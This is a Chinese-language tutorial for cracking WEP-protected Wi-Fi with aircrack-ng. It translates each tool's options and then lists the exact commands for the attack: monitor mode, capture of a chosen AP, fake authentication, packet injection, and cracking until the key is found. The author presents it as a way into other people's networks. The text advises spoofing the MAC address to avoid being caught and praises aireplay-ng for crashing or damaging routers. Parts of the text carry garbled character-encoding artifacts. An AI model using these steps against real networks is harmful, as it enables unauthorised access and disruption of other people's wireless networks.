| 安裝:$sudo apt-get install aircrack-ng Aircrack-ng無(wú)線(xiàn)破解工具包有很多工具,用到的工具主要有以下幾個(gè): airmon-ng 處理網(wǎng)卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 發(fā)包,干擾 1) airmon-ng 啟動(dòng)無(wú)線(xiàn)網(wǎng)卡進(jìn)入 Monitor 模式, useage: airmon-ng <start|stop|check> <interface> [channel] <start|stop|check>:?jiǎn)?dòng),停止,檢測 <interface>:指定無(wú)線(xiàn)網(wǎng)卡 [channel]:監聽(tīng)頻道,現代大多數無(wú)線(xiàn)路由默認是 6,隨便掃描一下都是這個(gè)頻道,網(wǎng)管們應該換換了 2) airodump-ng 抓包工具,我最喜歡用的,詳細用法如下: usage: airodump-ng <options> <interface>[,<interface>,...] Options: –ivs :僅將抓取信息保存為 .ivs –write <prefix> :保存為指定日文件名,我一般用這個(gè),尤其是多個(gè)網(wǎng)絡(luò )時(shí),指定了也好區分 –beacons :保存所有的 beacons ,默認情況況下是丟棄那些無(wú)用的數據包的 Filter options:–encrypt <suite> : 使用密碼序列過(guò)濾 AP –netmask <netmask> : 使用掩碼過(guò)濾 AP –bssid <bssid> : 使用 bssid 過(guò)濾 AP -a : 過(guò)濾無(wú)關(guān)的客戶(hù)端 –help : 顯示使用方法,翻譯到這里,感覺(jué)還是英文的貼切一點(diǎn),建議讀原文3)aireplay-ng 搞破壞的工具,注意殺傷力很大,甚至可以損壞劣質(zhì)的 AP 設備(小內存的路由器可能會(huì )重啟,或者徹底被破壞掉),我很喜歡這個(gè)東西,相信你也會(huì )喜歡的,使用時(shí)注意分寸. usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : AP的 MAC -d dmac:目標的 MAC -s smac :來(lái)源的 MAC -m len: 最小包長(cháng)度 -n len: 最大包長(cháng)度 -D: 禁用 AP 發(fā)現功能 Replay options: -x nbpps : 每秒包數量 -p fctrl : 框架設定 (hex) -a bssid : 設置AP的 mac -c dmac: 設置目標的 MAC -h smac: 設置來(lái)源的 mac -g value : 改變環(huán)緩存大小 (默認8) Fakeauth attack options: -e essid : 設置目標 AP 的 SSID -o npckts : 每秒爆破的包數量 (0 自動(dòng), 默認 1) -q sec: 存活時(shí)間 秒 -y prga: 共享可信的 key流 –help : 顯示這個(gè)幫助,這部分是全部依照我的使用來(lái)翻譯,沒(méi)有完全準確的翻譯,主要對付 那些不給出作者就引用的人,鄙視抄襲.4)aircrack-ng 破解KEY,漫長(cháng)的過(guò)程.漫不漫長(cháng)取決于兩個(gè)方面: 一是網(wǎng)管的聰明程度(能否設置出復雜的密碼),二是電腦的速度. usage: aircrack-ng [options] <.cap / .ivs file(s)> Common options: -a <amode> : 暴破 (1/WEP, 2/WPA-PSK) -e <essid> : 選擇 essid 為目標 -b <bssid> : 選擇 ap的 mac 為目標,就是破解識別的關(guān)鍵字 -q : 使用安靜模式,無(wú)數出模式 -C <macs> : 將所有的 AP 合并為一個(gè)虛擬的 –help: 顯示這個(gè)幫助 就WEP破解說(shuō)明,步驟: 步驟: 1. 修改無(wú)線(xiàn)網(wǎng)卡狀態(tài):先 down 掉 2. 偽造無(wú)線(xiàn)網(wǎng)卡的 MAC 地址:安全起見(jiàn),減少被抓到的可能 3. 修改網(wǎng)卡工作模式:進(jìn)入Monitor狀態(tài),會(huì )產(chǎn)生一個(gè)虛擬的網(wǎng)卡 4. 修改無(wú)線(xiàn)網(wǎng)卡狀態(tài): up 5. 查看網(wǎng)絡(luò )狀態(tài),記錄下 AP 的 MAC 和本機的 MAC ,確定攻擊目標 6. 監聽(tīng)抓包:生成 .cap 或 .ivs 7. 干擾無(wú)線(xiàn)網(wǎng)絡(luò ):截取無(wú)線(xiàn)數據包,發(fā)送垃圾數據包,用來(lái)獲得更多的有效數據包 8. 破解 .cap 或 .ivs ,獲得 WEP 密碼,完成破解 前面如何偽造網(wǎng)卡不在敘述,可參見(jiàn)這篇文章:http://www.path8.net/tn/archives/40 具體步驟: 1、首先確定是否有wlan0的無(wú)線(xiàn)網(wǎng)卡端口,ifconfig即可知道。若存在終端輸入 sudo airmon-ng start wlan0 啟動(dòng)無(wú)線(xiàn) 網(wǎng)卡 的監控模式。 ![]() 2、在終端中輸入 sudo airodump -ng mon0 ,啟動(dòng)監控模式后無(wú)線(xiàn)端口是mon0(如果啟動(dòng)多次會(huì )按數字累加), 看看有哪些采用wep 加密的AP在線(xiàn),然后按 ctrl+c 退出,保留終端。 ![]() 3、 另開(kāi)一個(gè)終端,輸入 sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c后面的6為AP工作頻道,--bissid后面的AP's MAC 是要欲破解AP的MAC地址,-w后的wep的是抓下來(lái)的數據包DATA 保存的文件名(可以隨便取名),然后回車(chē)開(kāi)始抓包。 ![]() (后來(lái)補上去的一張圖,所以時(shí)間不對:)) 4、再另開(kāi)一個(gè)終端,輸入 sudo aireplay-ng -1 0 -e ESSID -a AP's MAC -h My MAC mon0 與AP建立虛擬連接 (-h后面跟著(zhù)的My MAC 是自己的無(wú)線(xiàn)網(wǎng)卡的MAC地址) ![]() 這里以之前探測到的ESSID為P2P的為例。 5、建立虛擬連接成功后,輸入sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 進(jìn)行注入,現在步驟3中數據包應該不斷增長(cháng)。 ![]() 6、收集有5000個(gè)以上的DATA之后,另開(kāi)一個(gè)終端,輸入 sudo aircrack-ng wep*.cap 進(jìn)行解密 (如果沒(méi)算出來(lái)的話(huà),繼續等,Ubuntu aircrack-ng會(huì )在DATA每增加多5000個(gè)之后就自動(dòng)再運行 ,直到算出密碼為至) ![]() 7、破解出密碼后在終端中輸入 sudo airmon-ng stop mon0 關(guān)閉監控模式,不然無(wú)線(xiàn)網(wǎng)卡會(huì )一直向剛剛的AP進(jìn)行注入的,用ctrl+c退出或者直接關(guān)閉終端都是不行的,除非重新啟動(dòng)電腦。 ![]() 8、如果沒(méi)有出現意外,你應該會(huì )很高興的看到KEY FOUND! |
聯(lián)系客服